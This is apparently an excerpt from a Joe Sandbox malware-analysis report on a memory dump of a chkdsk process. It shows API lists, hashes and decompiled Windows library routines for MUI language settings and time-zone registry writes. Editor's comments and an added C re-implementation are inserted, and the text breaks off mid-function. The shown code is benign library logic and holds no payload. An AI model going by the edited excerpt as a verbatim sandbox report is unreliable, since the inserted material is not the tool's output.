                                          • Instruction ID: 832ac555b6c89879cfb69a561a971385d689ceb9ddaf15e874e28f40d31139d9
                                          • Opcode Fuzzy Hash: af69aab4bbfafe00aeeeb6c8681bc726d575944d437e7311a27a0ea2e220cc3b
                                          • Instruction Fuzzy Hash: 33F02B737803003BE32096E4CC43FF777949F81B10F140019F609AB2C2EAA5F90082A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(000A5186,?,000A58FF,000A58FF,?,000A5186,?,?,?,?,?,00000000,00000005,00000206), ref: 000AA60D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                          • Instruction ID: ae29bdb3e3ba9246cf94e116960e1d12a642af55ec37f8af7f453439bfc27b07
                                          • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                          • Instruction Fuzzy Hash: C0E01AB12002086BDB14DF89DC45E9737ACEF88654F118154BA085B242C630F910CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 000AA64D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                          • Instruction ID: b9f536ac083168ecb820cd8dd13fbb7bccb2cfdb5b9b840bdb6c431fd47441ab
                                          • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                          • Instruction Fuzzy Hash: 9FE012B1200208AFDB18EF89DC49EA737ACEF88750F118158BA085B282C630E910CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009D5C2,0009D5C2,?,00000000,?,?), ref: 000AA7B0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                          • Instruction ID: 3c53c33b4c029773eec24b7fe9ccde8f4b1a7e54cda578fd5ff121143860fe6b
                                          • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                          • Instruction Fuzzy Hash: 36E01AB12002086FDB14DF89CC45EE737ADEF89654F118164BA0857242C630E8148AB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,00098233,?), ref: 0009DA5B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: e22c9543408ccf2bb301c99296c2202a42c017a0b5b6a1eabdb39d3170ae88e0
                                          • Instruction ID: dc7e8c81633cf1bfe546de91d46610890a1546959ebc3f28478d62fa66680d89
                                          • Opcode Fuzzy Hash: e22c9543408ccf2bb301c99296c2202a42c017a0b5b6a1eabdb39d3170ae88e0
                                          • Instruction Fuzzy Hash: 08D05EBA7803412AFE10DBF09D46FA53B98AB5A655F4A40A5FA49DA3C3D560D0018625
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,00098233,?), ref: 0009DA5B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                          • Instruction ID: 867f073bbc9c195a80acb005c590be0c209f8404acf6e5f1b2fba76731f0e013
                                          • Opcode Fuzzy Hash: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                          • Instruction Fuzzy Hash: ACD0A7717903043BFA10EAE49C43F6633CCAB49B50F454064FA09D73C3D950F4008165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E023B8788(signed int __ecx, void* __edx, signed int _a4) {
                                          				signed int _v8;
                                          				short* _v12;
                                          				void* _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				char _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				void* _t216;
                                          				intOrPtr _t231;
                                          				short* _t235;
                                          				intOrPtr _t257;
                                          				short* _t261;
                                          				intOrPtr _t284;
                                          				intOrPtr _t288;
                                          				void* _t314;
                                          				signed int _t318;
                                          				short* _t319;
                                          				intOrPtr _t321;
                                          				void* _t328;
                                          				void* _t329;
                                          				char* _t332;
                                          				signed int _t333;
                                          				signed int* _t334;
                                          				void* _t335;
                                          				void* _t338;
				void* _t339;
				/* temporaries used below but left undeclared by the decompiler */
				void* _t207;
				void* _t236;
				void* _t269;
				void* _t296;
				signed int _t322;
                                          
                                          				_t328 = __edx;
                                          				_t322 = __ecx;
                                          				_t318 = 0;
                                          				_t334 = _a4;
                                          				_v8 = 0;
                                          				_v28 = 0;
                                          				_v48 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v52 = 0;
                                          				if(_t334 == 0) {
                                          					_t329 = 0xc000000d;
                                          					L49:
                                          					_t334[0x11] = _v56;
                                          					 *_t334 =  *_t334 | 0x00000800;
                                          					_t334[0x12] = _v60;
                                          					_t334[0x13] = _v28;
                                          					_t334[0x17] = _v20;
                                          					_t334[0x16] = _v48;
                                          					_t334[0x18] = _v40;
                                          					_t334[0x14] = _v32;
                                          					_t334[0x15] = _v52;
                                          					return _t329;
                                          				}
                                          				_v56 = 0;
                                          				if(E023B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          						_t207 = E0239E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                          					}
                                          					_push(1);
                                          					_v8 = _t318;
                                          					E023B718A(_t207);
                                          					_t335 = _t335 + 4;
                                          				}
                                          				_v60 = _v60 | 0xffffffff;
                                          				if(E023B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                          					_t333 =  *_v8;
                                          					_v60 = _t333;
                                          					_t314 = E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          					_push(_t333);
                                          					_v8 = _t318;
                                          					E023B718A(_t314);
                                          					_t335 = _t335 + 4;
                                          				}
                                          				_t216 = E023B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                          				_t332 = ";";
                                          				if(_t216 < 0) {
                                          					L17:
                                          					if(E023B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                          						L30:
                                          						if(E023B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                          							L46:
                                          							_t329 = 0;
                                          							L47:
                                          							if(_v8 != _t318) {
                                          								E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          							}
                                          							if(_v28 != _t318) {
                                          								if(_v20 != _t318) {
                                          									E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                          									_v20 = _t318;
                                          									_v40 = _t318;
                                          								}
                                          							}
                                          							goto L49;
                                          						}
                                          						_t231 = _v24;
                                          						_t322 = _t231 + 4;
                                          						_push(_t231);
                                          						_v52 = _t322;
                                          						E023B718A(_t231);
                                          						if(_t322 == _t318) {
                                          							_v32 = _t318;
                                          						} else {
                                          							_v32 = E0239E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          						}
                                          						if(_v32 == _t318) {
                                          							_v52 = _t318;
                                          							L58:
                                          							_t329 = 0xc0000017;
                                          							goto L47;
                                          						} else {
                                          							E02392340(_v32, _v8, _v24);
                                          							_v16 = _v32;
                                          							_a4 = _t318;
                                          							_t235 = E023AE679(_v32, _t332);
                                          							while(1) {
                                          								_t319 = _t235;
                                          								if(_t319 == 0) {
                                          									break;
                                          								}
                                          								 *_t319 = 0;
                                          								_t321 = _t319 + 2;
                                          								E0239E2A8(_t322,  &_v68, _v16);
                                          								if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
                                          									_a4 = _a4 + 1;
                                          								}
                                          								_v16 = _t321;
                                          								_t235 = E023AE679(_t321, _t332);
                                          								_pop(_t322);
                                          							}
                                          							_t236 = _v16;
                                          							if( *_v16 != _t319) {
                                          								E0239E2A8(_t322,  &_v68, _t236);
                                          								if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
                                          									_a4 = _a4 + 1;
                                          								}
                                          							}
                                          							if(_a4 == 0) {
                                          								E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                          								_v52 = _v52 & 0x00000000;
                                          								_v32 = _v32 & 0x00000000;
                                          							}
                                          							if(_v8 != 0) {
                                          								E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                          							}
                                          							_v8 = _v8 & 0x00000000;
                                          							_t318 = 0;
                                          							goto L46;
                                          						}
                                          					}
                                          					_t257 = _v24;
                                          					_t322 = _t257 + 4;
                                          					_push(_t257);
                                          					_v40 = _t322;
                                          					E023B718A(_t257);
                                          					_t338 = _t335 + 4;
                                          					if(_t322 == _t318) {
                                          						_v20 = _t318;
                                          					} else {
                                          						_v20 = E0239E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          					}
                                          					if(_v20 == _t318) {
                                          						_v40 = _t318;
                                          						goto L58;
                                          					} else {
                                          						E02392340(_v20, _v8, _v24);
                                          						_v16 = _v20;
                                          						_a4 = _t318;
                                          						_t261 = E023AE679(_v20, _t332);
                                          						_t335 = _t338 + 0x14;
                                          						while(1) {
                                          							_v12 = _t261;
                                          							if(_t261 == _t318) {
                                          								break;
                                          							}
                                          							_v12 = _v12 + 2;
                                          							 *_v12 = 0;
                                          							E0239E2A8(_v12,  &_v68, _v16);
                                          							if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
                                          								_a4 = _a4 + 1;
                                          							}
                                          							_v16 = _v12;
                                          							_t261 = E023AE679(_v12, _t332);
                                          							_pop(_t322);
                                          						}
                                          						_t269 = _v16;
                                          						if( *_v16 != _t318) {
                                          							E0239E2A8(_t322,  &_v68, _t269);
                                          							if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
                                          								_a4 = _a4 + 1;
                                          							}
                                          						}
                                          						if(_a4 == _t318) {
                                          							E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                          							_v40 = _t318;
                                          							_v20 = _t318;
                                          						}
                                          						if(_v8 != _t318) {
                                          							E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          						}
                                          						_v8 = _t318;
                                          						goto L30;
                                          					}
                                          				}
                                          				_t284 = _v24;
                                          				_t322 = _t284 + 4;
                                          				_push(_t284);
                                          				_v48 = _t322;
                                          				E023B718A(_t284);
                                          				_t339 = _t335 + 4;
                                          				if(_t322 == _t318) {
                                          					_v28 = _t318;
                                          				} else {
                                          					_v28 = E0239E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          				}
                                          				if(_v28 == _t318) {
                                          					_v48 = _t318;
                                          					goto L58;
                                          				} else {
                                          					E02392340(_v28, _v8, _v24);
                                          					_v16 = _v28;
                                          					_a4 = _t318;
                                          					_t288 = E023AE679(_v28, _t332);
                                          					_t335 = _t339 + 0x14;
                                          					while(1) {
                                          						_v12 = _t288;
                                          						if(_t288 == _t318) {
                                          							break;
                                          						}
                                          						_v12 = _v12 + 2;
                                          						 *_v12 = 0;
                                          						E0239E2A8(_v12,  &_v68, _v16);
                                          						if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
                                          							_a4 = _a4 + 1;
                                          						}
                                          						_v16 = _v12;
                                          						_t288 = E023AE679(_v12, _t332);
                                          						_pop(_t322);
                                          					}
                                          					_t296 = _v16;
                                          					if( *_v16 != _t318) {
                                          						E0239E2A8(_t322,  &_v68, _t296);
                                          						if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
                                          							_a4 = _a4 + 1;
                                          						}
                                          					}
                                          					if(_a4 == _t318) {
                                          						E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                          						_v48 = _t318;
                                          						_v28 = _t318;
                                          					}
                                          					if(_v8 != _t318) {
                                          						E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          					}
                                          					_v8 = _t318;
                                          					goto L17;
                                          				}
                                          			}
                                          0x023b8981
                                          0x023b8986
                                          0x00000000
                                          0x00000000
                                          0x02401b6e
                                          0x02401b74
                                          0x02401b7b
                                          0x02401b8f
                                          0x02401b91
                                          0x02401b91
                                          0x02401b99
                                          0x02401b9c
                                          0x02401ba2
                                          0x02401ba2
                                          0x023b898c
                                          0x023b8992
                                          0x023b8999
                                          0x023b89ad
                                          0x02401ba8
                                          0x02401ba8
                                          0x023b89ad
                                          0x023b89b6
                                          0x023b89c8
                                          0x023b89cd
                                          0x023b89d0
                                          0x023b89d0
                                          0x023b89d6
                                          0x023b89e8
                                          0x023b89e8
                                          0x023b89ed
                                          0x00000000
                                          0x023b89ed
                                          0x023b895a
                                          0x023b883e
                                          0x023b8841
                                          0x023b8844
                                          0x023b8845
                                          0x023b8848
                                          0x023b884d
                                          0x023b8852
                                          0x023b8b49
                                          0x023b8858
                                          0x023b886c
                                          0x023b886c
                                          0x023b8872
                                          0x02401b0e
                                          0x00000000
                                          0x023b8878
                                          0x023b8881
                                          0x023b888b
                                          0x023b888e
                                          0x023b8891
                                          0x023b8896
                                          0x023b8899
                                          0x023b8899
                                          0x023b889e
                                          0x00000000
                                          0x00000000
                                          0x02401b21
                                          0x02401b27
                                          0x02401b2e
                                          0x02401b42
                                          0x02401b44
                                          0x02401b44
                                          0x02401b4c
                                          0x02401b4f
                                          0x02401b55
                                          0x02401b55
                                          0x023b88a4
                                          0x023b88aa
                                          0x023b88b1
                                          0x023b88c5
                                          0x02401b5b
                                          0x02401b5b
                                          0x023b88c5
                                          0x023b88ce
                                          0x023b88e0
                                          0x023b88e5
                                          0x023b88e8
                                          0x023b88e8
                                          0x023b88ee
                                          0x023b8900
                                          0x023b8900
                                          0x023b8905
                                          0x00000000
                                          0x023b8905

                                          APIs
                                          Strings
                                          • WindowsExcludedProcs, xrefs: 023B87C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 023B8914
                                          • Kernel-MUI-Number-Allowed, xrefs: 023B87E6
                                          • Kernel-MUI-Language-SKU, xrefs: 023B89FC
                                          • Kernel-MUI-Language-Allowed, xrefs: 023B8827
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: 4ed419bf6994e13974859bcd3e96bf17b5c25f6688ae9beb92250a8f72667201
                                          • Instruction ID: ca34e88815e61699b71badd0aacec4f25313bfd5ceb593a0edfb78a82f13781a
                                          • Opcode Fuzzy Hash: 4ed419bf6994e13974859bcd3e96bf17b5c25f6688ae9beb92250a8f72667201
                                          • Instruction Fuzzy Hash: 6AF1E8B2D00209EFDF22DFA9C9809EEB7B9FF09304F14446AE605A7651E7349A45DF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			// Editor's reading of this routine: E02445A34 is wcsnlen (see the Similarity block below),
                                          			// bounded to 0x20 wide chars for the two name fields at +4 and +0x58. E023E7DCD(1, &_v8)
                                          			// appears to open the time-zone registry key into _v8, which E0238F9F0 closes at the end.
                                          			// E0242810D is called as (0x40000000, key, name, type, data, length): 0x40000000 is
                                          			// RTL_REGISTRY_HANDLE and the types are REG_SZ (1), REG_BINARY (3) and REG_DWORD (4),
                                          			// i.e. the RtlWriteRegistryValue calling convention. The offsets 0x44, 0x54, 0x58, 0x98,
                                          			// 0xa8, 0xac and 0x1ac together with the 0x1b0 size test are those of a
                                          			// DYNAMIC_TIME_ZONE_INFORMATION, and the whole sequence matches ntdll's
                                          			// RtlSetTimeZoneInformation. That points to this dumped region being mapped library
                                          			// code rather than the payload's own logic.
                                          			E0242822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
                                          				char _v8;
                                          				void* __ebx;
                                          				signed int _t41;
                                          				void* _t42;
                                          				signed int* _t50;
                                          				void* _t71;
                                          				void* _t73;
                                          				void* _t78;
                                          				signed int _t81;
                                          				void* _t84;
                                          
                                          				_push(__ecx);
                                          				_t81 = _a4;
                                          				_t84 = 0x20;
                                          				_t71 = E02445A34(_t81 + 4, _t84);
                                          				if(_t71 < _t84) {
                                          					_t41 = E02445A34(_t81 + 0x58, _t84);
                                          					_pop(_t78);
                                          					_a4 = _t41;
                                          					__eflags = _t41 - _t84;
                                          					if(_t41 >= _t84) {
                                          						goto L1;
                                          					} else {
                                          						_t42 = E023E7DCD(1,  &_v8);
                                          						__eflags = _t42;
                                          						if(__eflags >= 0) {
                                          							__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
                                          							if(__eflags < 0) {
                                          								L14:
                                          								_a4 = 0;
                                          								_t73 = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
                                          								__eflags = _t73;
                                          								if(__eflags >= 0) {
                                          									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
                                          									_t50 =  &_a8;
                                          									goto L16;
                                          								}
                                          							} else {
                                          								_t8 = _t71 + 2; // 0x2
                                          								__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
                                          								if(__eflags < 0) {
                                          									goto L14;
                                          								} else {
                                          									_t71 = 4;
                                          									__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
                                          									if(__eflags < 0) {
                                          										goto L14;
                                          									} else {
                                          										__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
                                          										if(__eflags < 0) {
                                          											goto L14;
                                          										} else {
                                          											__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
                                          											if(__eflags < 0) {
                                          												goto L14;
                                          											} else {
                                          												__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
                                          												if(__eflags < 0) {
                                          													goto L14;
                                          												} else {
                                          													__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
                                          													if(__eflags < 0) {
                                          														goto L14;
                                          													} else {
                                          														__eflags = _a8 - 0x1b0;
                                          														if(__eflags < 0) {
                                          															goto L14;
                                          														} else {
                                          															_t73 = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
                                          															__eflags = _t73;
                                          															if(__eflags >= 0) {
                                          																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
                                          																_t50 =  &_a4;
                                          																L16:
                                          																_t73 = E0242810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
                                          															}
                                          														}
                                          													}
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          							E0238F9F0(_v8); // close the key handle opened by E023E7DCD above
                                          							_t42 = _t73;
                                          						}
                                          					}
                                          				} else {
                                          					L1:
                                          					_t42 = 0xc000000d; // STATUS_INVALID_PARAMETER: a name field is not terminated within 0x20 chars
                                          				}
                                          				return _t42;
                                          			}


                                          Per-line address column for E0242822C, flattened by extraction (addresses 0x02428231 through 0x024283df; 0x00000000 marks lines with no address).

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: _wcsnlen
                                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                          • API String ID: 3628947076-1387797911
                                          • Opcode ID: 836e7d717090ab8025fe6f534f1ff6b2080d1a4d2dbb5b23a5caf739062a0c78
                                          • Instruction ID: f0b0aca8a373f69d03cc30532742fe920f664d1d974a326b3720d9c8ddbdd126
                                          • Opcode Fuzzy Hash: 836e7d717090ab8025fe6f534f1ff6b2080d1a4d2dbb5b23a5caf739062a0c78
                                          • Instruction Fuzzy Hash: 7E419471240238BAFB129AA3CD81FEFB76D9F04744F504127FA05D9190D7B1EA588BB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%
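The write sequence in E0242822C is easier to audit when written out plainly. What follows is an added example by the editor, not code from the sample, from this report or from ntdll: it re-states the routine's validation and write order in C over the structure layout its offsets imply, with the registry write behind a callback so the sequence can be exercised offline. The names `tz_dynamic_info`, `set_time_zone_information`, `layout_matches_decompile`, `record_write` and `sample_tz` are the example's own, and the key open performed by E023E7DCD is assumed to have succeeded. One thing it makes visible: a failed write of any of the first seven values is not reported, because control falls through to the fallback that writes an empty TimeZoneKeyName, and the status returned is that of the last write.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define REG_SZ     1u
#define REG_BINARY 3u
#define REG_DWORD  4u
#define STATUS_INVALID_PARAMETER ((int32_t)0xC000000D)

/* Layout implied by the offsets in the decompile (0x1b0 bytes; the non-dynamic
 * variant stops at 0xac). Wide chars are uint16_t so this also builds on Linux. */
typedef struct {
    int32_t  Bias;                        /* 0x000 */
    uint16_t StandardName[32];            /* 0x004, the wcsnlen bound of 0x20 */
    uint16_t StandardDate[8];             /* 0x044, 16-byte SYSTEMTIME written as REG_BINARY */
    int32_t  StandardBias;                /* 0x054 */
    uint16_t DaylightName[32];            /* 0x058 */
    uint16_t DaylightDate[8];             /* 0x098 */
    int32_t  DaylightBias;                /* 0x0a8 */
    uint16_t TimeZoneKeyName[128];        /* 0x0ac, 0x100 bytes */
    uint8_t  DynamicDaylightTimeDisabled; /* 0x1ac, widened to a DWORD when written */
} tz_dynamic_info;

/* Pins the struct to the decompile's offsets; returns 1 when they agree. */
int layout_matches_decompile(void)
{
    return offsetof(tz_dynamic_info, StandardBias) == 0x54 && offsetof(tz_dynamic_info, DaylightName) == 0x58 &&
           offsetof(tz_dynamic_info, DaylightBias) == 0xa8 && offsetof(tz_dynamic_info, TimeZoneKeyName) == 0xac &&
           offsetof(tz_dynamic_info, DynamicDaylightTimeDisabled) == 0x1ac && sizeof(tz_dynamic_info) == 0x1b0;
}

/* Stand-in for E0242810D(RTL_REGISTRY_HANDLE, key, name, type, data, len); < 0 means failure. */
typedef int32_t (*reg_writer)(void *ctx, const char *name, uint32_t type, const void *data, uint32_t len);

static size_t wcsnlen16(const uint16_t *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != 0) n++;
    return n;
}

/* The decompile's control flow: validate both names, write the seven static values,
 * then TimeZoneKeyName and DynamicDaylightTimeDisabled. Any failure, or a caller
 * passing less than the dynamic size, falls through to writing an empty key name
 * (the decompile's L14). The status returned is that of the LAST write. */
int32_t set_time_zone_information(const tz_dynamic_info *tz, size_t size, reg_writer put, void *ctx)
{
    size_t std_len = wcsnlen16(tz->StandardName, 32);
    if (std_len >= 32) return STATUS_INVALID_PARAMETER;
    size_t dlt_len = wcsnlen16(tz->DaylightName, 32);
    if (dlt_len >= 32) return STATUS_INVALID_PARAMETER;

    int full = put(ctx, "Bias",          REG_DWORD,  &tz->Bias, 4) >= 0
            && put(ctx, "StandardName",  REG_SZ,     tz->StandardName, (uint32_t)(std_len + 1) * 2) >= 0
            && put(ctx, "StandardBias",  REG_DWORD,  &tz->StandardBias, 4) >= 0
            && put(ctx, "StandardStart", REG_BINARY, tz->StandardDate, 16) >= 0
            && put(ctx, "DaylightName",  REG_SZ,     tz->DaylightName, (uint32_t)(dlt_len + 1) * 2) >= 0
            && put(ctx, "DaylightBias",  REG_DWORD,  &tz->DaylightBias, 4) >= 0
            && put(ctx, "DaylightStart", REG_BINARY, tz->DaylightDate, 16) >= 0
            && size >= sizeof(tz_dynamic_info);
    static const uint16_t empty = 0;
    int32_t st = full ? put(ctx, "TimeZoneKeyName", REG_SZ, tz->TimeZoneKeyName, sizeof tz->TimeZoneKeyName)
                      : put(ctx, "TimeZoneKeyName", REG_SZ, &empty, 2);
    if (st >= 0) {
        uint32_t flag = tz->DynamicDaylightTimeDisabled;
        st = put(ctx, "DynamicDaylightTimeDisabled", REG_DWORD, &flag, 4);
    }
    return st;
}

/* Recording writer for offline checks: logs names and lengths in call order and
 * fails the fail_at-th call (1-based; 0 never fails). */
typedef struct { char names[16][32]; uint32_t lens[16]; int count; int fail_at; } write_log;

int32_t record_write(void *ctx, const char *name, uint32_t type, const void *data, uint32_t len)
{
    write_log *wl = ctx;
    (void)type; (void)data;
    if (wl->count < 16) { snprintf(wl->names[wl->count], 32, "%s", name); wl->lens[wl->count] = len; }
    wl->count++;
    return wl->count == wl->fail_at ? -1 : 0;
}

static void set_name16(uint16_t *dst, size_t cap, const char *src)
{
    size_t i = 0;
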